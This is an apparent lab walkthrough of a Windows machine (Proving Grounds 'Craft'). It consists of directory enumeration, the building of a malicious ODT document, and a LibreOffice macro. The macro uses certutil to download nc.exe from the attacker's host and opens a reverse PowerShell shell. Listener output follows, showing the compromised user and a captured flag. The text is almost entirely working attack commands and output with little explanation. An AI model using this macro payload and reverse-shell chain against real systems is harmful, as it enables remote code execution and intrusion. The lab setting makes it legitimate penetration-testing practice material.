Foothold

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 -u http://192.168.190.169/               
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.190.169/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 304]
/index.php            (Status: 200) [Size: 9635]
/uploads              (Status: 301) [Size: 344] [--> http://192.168.190.169/uploads/]
/assets               (Status: 301) [Size: 343] [--> http://192.168.190.169/assets/]
/upload.php           (Status: 200) [Size: 537]
/css                  (Status: 301) [Size: 340] [--> http://192.168.190.169/css/]
/Index.php            (Status: 200) [Size: 9635]
/js                   (Status: 301) [Size: 339] [--> http://192.168.190.169/js/]
/examples             (Status: 503) [Size: 404]
/licenses             (Status: 403) [Size: 423]
/%20                  (Status: 403) [Size: 304]
/Assets               (Status: 301) [Size: 343] [--> http://192.168.190.169/Assets/]
/INDEX.php            (Status: 200) [Size: 9635]

$ python3 badodt.py
Traceback (most recent call last):
  File "/home/adot/oscp/pg/craft/badodt.py", line 6, in <module>
    import ezodf
ModuleNotFoundError: No module named 'ezodf'
                                                                                                                                                                                              
$ pip3 install ezodf
Defaulting to user installation because normal site-packages is not writeable
Collecting ezodf
  Downloading ezodf-0.3.2.tar.gz (125 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 125.9/125.9 kB 1.4 MB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: ezodf
  Building wheel for ezodf (setup.py) ... done
  Created wheel for ezodf: filename=ezodf-0.3.2-py2.py3-none-any.whl size=49000 sha256=a93840c81ae1b63abd637c5d38a4742dade4ab8c7bcb33dfa94db5ea4d97fc92
  Stored in directory: /home/adot/.cache/pip/wheels/bb/23/3b/cce8669e20fa103fa8cd5d060b7e63ebb93cfbebd29a9e5d43
Successfully built ezodf
Installing collected packages: ezodf
Successfully installed ezodf-0.3.2

$ sudo responder -I tun0 -A

Sub Main
	shell("cmd /c certutil.exe -urlcache -f http://192.168.45.239/nc.exe C:\programdata\nc.exe")
	shell("C:\programdata\nc.exe 192.168.45.239 1337 -e powershell.exe")
End Sub

$ nc -lnvp 1337

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.190.169] 49872
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Program Files\LibreOffice\program> whoami
whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> type C:\Users\thecybergeek\Desktop\local.txt
type C:\Users\thecybergeek\Desktop\local.txt
e333f88e0aab5ee87441ab456962125d
PS C:\Program Files\LibreOffice\program> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::8d35:9224:7b42:3ef8%5
   IPv4 Address. . . . . . . . . . . : 192.168.190.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.190.254
PS C:\Program Files\LibreOffice\program>